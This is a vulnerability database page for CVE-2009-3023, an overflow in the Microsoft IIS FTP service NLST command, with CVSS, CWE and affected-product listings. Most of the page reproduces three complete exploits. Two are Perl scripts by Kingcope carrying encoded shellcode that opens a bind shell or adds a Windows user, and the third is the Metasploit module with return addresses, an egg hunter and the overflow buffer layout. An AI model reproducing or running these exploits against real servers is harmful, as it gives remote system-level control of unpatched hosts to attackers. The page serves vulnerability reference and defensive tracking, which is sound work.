CVE-2009-3023 : Detail

CVE-2009-3023

Overflow
97.01%V3
Network
2009-08-31
18h00 +00:00
2018-10-12
17h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 6.0 allows remote authenticated users to execute arbitrary code via a crafted NLST (NAME LIST) command that uses wildcards, leading to memory corruption, aka "IIS FTP Service RCE and DoS Vulnerability."

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9 AV:N/AC:L/Au:S/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 9559

Publication date : 2009-08-31 22h00 +00:00
Author : muts
EDB Verified : Yes

#!/usr/bin/perl # IIS 5.0 FTP Server / Remote SYSTEM exploit # Win2k SP4 targets # bug found & exploited by Kingcope, kcope2<at>googlemail.com # Affects IIS6 with stack cookie protection # Modded by muts, additional egghunter added for secondary larger payload # Might take a minute or two for the egg to be found. # Opens bind shell on port 4444 # http://www.offensive-security.com/0day/msftp.pl.txt use IO::Socket; $|=1; $sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" . "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" . "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" . "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" . "\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" . "\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" . "\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" . "\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" . "\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41"; # ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d" $shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" . "\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" . "\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" . "\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" . "\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" . "\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" . "\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" . "\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" . "\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" . "\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" . "\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" . "\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" . "\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" . "\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" . "\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" . "\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" . "\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" . "\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" . "\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" . "\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" . "\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" . "\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" . "\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" . "\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" . "\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90"; print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n"; if ($#ARGV ne 1) { print "usage: iiz5.pl <target> <your local ip>\n"; exit(0); } srand(time()); $port = int(rand(31337-1022)) + 1025; $locip = $ARGV[1]; $locip =~ s/\./,/gi; if (fork()) { $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '21', Proto => 'tcp'); $patch = "\x7E\xF1\xFA\x7F"; $retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms $v = "KSEXY" . $sc . "V" x (500-length($sc)-5); # top address of stack frame where shellcode resides, is hardcoded inside this block $findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53" ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0"; # attack buffer $c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. "HHHHIIII". $patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN"; $x = <$sock>; print $x; print $sock "USER anonimoos\r\n"; $x = <$sock>; print $x; print $sock "PASS $shell\r\n"; $x = <$sock>; print $x; print $sock "USER anonimoos\r\n"; $x = <$sock>; print $x; print $sock "PASS $shell\r\n"; $x = <$sock>; print $x; print $sock "USER anonymous\r\n"; $x = <$sock>; print $x; print $sock "PASS anonymous\r\n"; $x = <$sock>; print $x; print $sock "MKD w00t$port\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack) $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "CWD w00t$port\r\n"; $x = <$sock>; print $x; print $sock "MKD CCC". "$c\r\n"; $x = <$sock>; print $x; print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n"; $x = <$sock>; print $x; # TRIGGER print $sock "NLST $c*/../C*/\r\n"; $x = <$sock>; print $x; while (1) {} } else { my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); die "Could not create socket: $!\n" unless $servsock; my $new_sock = $servsock->accept(); while(<$new_sock>) { print $_; } close($servsock); } #Cheerio, # #Kingcope # milw0rm.com [2009-09-01]
Exploit Database EDB-ID : 9541

Publication date : 2009-08-30 22h00 +00:00
Author : kingcope
EDB Verified : Yes

# IIS 5.0 FTPd / Remote r00t exploit # Win2k SP4 targets # bug found & exploited by Kingcope, kcope2<at>googlemail.com # Affects IIS6 with stack cookie protection # August 2009 - KEEP THIS 0DAY PRIV8 use IO::Socket; $|=1; #metasploit shellcode, adduser "winown:nwoniw" $sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" . "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" . "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" . "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" . "\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" . "\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" . "\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" . "\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" . "\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" . "\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" . "\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" . "\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" . "\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" . "\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" . "\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" . "\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" . "\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" . "\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" . "\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" . "\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" . "\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" . "\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" . "\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" . "\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" . "\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" . "\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" . "\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" . "\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" . "\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" . "\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" . "\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" . "\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" . "\x51\x54\x43\x30\x41\x41"; #1ca print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n"; if ($#ARGV ne 1) { print "usage: iiz5.pl <target> <your local ip>\n"; exit(0); } srand(time()); $port = int(rand(31337-1022)) + 1025; $locip = $ARGV[1]; $locip =~ s/\./,/gi; if (fork()) { $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '21', Proto => 'tcp'); $patch = "\x7E\xF1\xFA\x7F"; #$retaddr = "ZZZZ"; $retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms $v = "KSEXY" . $sc . "V" x (500-length($sc)-5); # top address of stack frame where shellcode resides, is hardcoded inside this block $findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53" ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0"; # attack buffer $c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. "HHHHIIII". $patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN"; $x = <$sock>; print $x; print $sock "USER anonymous\r\n"; $x = <$sock>; print $x; print $sock "PASS anonymous\r\n"; $x = <$sock>; print $x; print $sock "MKD w00t$port\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack) $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "CWD w00t$port\r\n"; $x = <$sock>; print $x; print $sock "MKD CCC". "$c\r\n"; $x = <$sock>; print $x; print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n"; $x = <$sock>; print $x; # TRIGGER print $sock "NLST $c*/../C*/\r\n"; $x = <$sock>; print $x; while (1) {} } else { my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); die "Could not create socket: $!\n" unless $servsock; my $new_sock = $servsock->accept(); while(<$new_sock>) { print $_; } close($servsock); } #Cheerio, # #Kingcope # milw0rm.com [2009-08-31]
Exploit Database EDB-ID : 16740

Publication date : 2010-11-11 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: ms09_053_ftpd_nlst.rb 11003 2010-11-12 06:19:49Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft IIS FTP Server NLST Response Overflow', 'Description' => %q{ This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP service. The flaw is triggered when a special NLST argument is passed while the session has changed into a long directory path. For this exploit to work, the FTP server must be configured to allow write access to the file system (either anonymously or in conjunction with a real account) }, 'Author' => [ 'Kingcope <kcope2[at]googlemail.com>', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 11003 $', 'References' => [ ['URL', 'http://milw0rm.com/exploits/9541'], ['CVE', '2009-3023'], ['OSVDB', '57589'], ['BID', '36189'], ['MSB', 'MS09-053'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Privileged' => true, 'Payload' => { 'Space' => 490, 'BadChars' => "\x00\x09\x0c\x20\x0a\x0d\x0b", # This is for the stored payload, the real BadChar list for file paths is: # \x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x22\x2a\x2e\x2f\x3a\x3c\x3e\x3f\x5c\x7c 'StackAdjustment' => -3500, }, 'Platform' => [ 'win' ], 'Targets' => [ [ 'Windows 2000 SP4 English/Italian (IIS 5.0)', { 'Ret' => 0x773d24eb, # jmp esp in activeds.dll (English / 5.0.2195.6601) 'Patch' => 0x7ffd7ffd # works for off-by-two alignment }, ], [ 'Windows 2000 SP3 English (IIS 5.0)', { 'Ret' => 0x77e42ed8, # jmp esp in user32.dll (English / 5.0.2195.7032) 'Patch' => 0x7ffd7ffd # works for off-by-two alignment }, ], [ # target from TomokiSanaki 'Windows 2000 SP0-SP3 Japanese (IIS 5.0)', { 'Ret' => 0x774fa593, # jmp esp in ?? (Japanese) 'Patch' => 0x7ffd7ffd # works for off-by-two alignment }, ], ], 'DisclosureDate' => 'Aug 31 2009', 'DefaultTarget' => 0)) register_options([Opt::RPORT(21),], self.class) end def exploit connect_login based = rand_text_alpha_upper(10) res = send_cmd( ['MKD', based ], true ) print_status(res.strip) if (res !~ /directory created/) print_error("The root directory of the FTP server is not writeable") disconnect return end res = send_cmd( ['CWD', based ], true ) print_status(res.strip) egg = rand_text_alpha_upper(4) hun = "\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38#{egg}\x75\xF7\x40\x40\x40\x40\xFF\xE0" # This egg hunter is necessary because of the huge set of restricted characters for directory names # The best that metasploit could so was 133 bytes for an alphanum encoded egg hunter # The egg hunter above was written by kcope and searches from 0x70000 forward (stack) in order # to locate the real shellcode. The only change from the original hunter was to randomize the # prefix used. # Store our real shellcode on the stack 1.upto(5) do res = send_cmd( ['SITE', egg + payload.encoded.gsub("\xff", "\xff\xff") ], true ) end # Create the directory path that will be used in the overflow pre = rand_text_alpha_upper(3) # esp+0x28 points here pst = rand_text_alpha_upper(210) # limited by max path pst[ 0, hun.length] = hun # egg hunter pst[ 90, 4] = [target['Patch']].pack('V') # patch smashed pointers pst[ 94, 4] = [target['Patch']].pack('V') # patch smashed pointers pst[140, 32] = [target['Patch']].pack('V') * 8 # patch smashed pointers pst[158, 4] = [target.ret].pack("V") # return pst[182, 5] = "\xe9" + [-410].pack("V") # jmp back # Escape each 0xff with another 0xff for FTP pst = pst.gsub("\xff", "\xff\xff") print_status("Creating long directory...") res = send_cmd( ['MKD', pre+pst ], true ) print_status(res.strip) srv = Rex::Socket::TcpServer.create( 'LocalHost' => '0.0.0.0', 'LocalPort' => 0, 'SSL' => false, 'Context' => { 'Msf' => framework, 'MsfExploit' => self, } ) add_socket(srv) begin thr = framework.threads.spawn("Module(#{self.refname})-Listener", false) { srv.accept } prt = srv.getsockname[2] prt1 = prt / 256 prt2 = prt % 256 addr = Rex::Socket.source_address(rhost).gsub(".", ",") + ",#{prt1},#{prt2}" res = send_cmd( ['PORT', addr ], true ) print_status(res.strip) print_status("Trying target #{target.name}...") res = send_cmd( ['NLST', pre+pst + "*/../" + pre + "*/"], true ) print_status(res.strip) if res select(nil,nil,nil,2) handler disconnect ensure thr.kill srv.close end end end

Products Mentioned

Configuraton 0

Microsoft>>Internet_information_server >> Version From (including) 5.0 To (including) 6.0

Microsoft>>Windows_2000 >> Version -

Microsoft>>Windows_server_2003 >> Version -

Microsoft>>Windows_server_2003 >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

Configuraton 0

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version -

    Microsoft>>Windows_vista >> Version -

    Microsoft>>Windows_vista >> Version -

    Microsoft>>Windows_vista >> Version -

    Microsoft>>Windows_vista >> Version -

    Microsoft>>Windows_vista >> Version -

    Microsoft>>Windows_vista >> Version -

    References

    http://www.securityfocus.com/bid/36189
    Tags : vdb-entry, x_refsource_BID
    http://www.exploit-db.com/exploits/9541
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.us-cert.gov/cas/techalerts/TA09-286A.html
    Tags : third-party-advisory, x_refsource_CERT
    http://www.vupen.com/english/advisories/2009/2481
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.exploit-db.com/exploits/9559
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.kb.cert.org/vuls/id/276653
    Tags : third-party-advisory, x_refsource_CERT-VN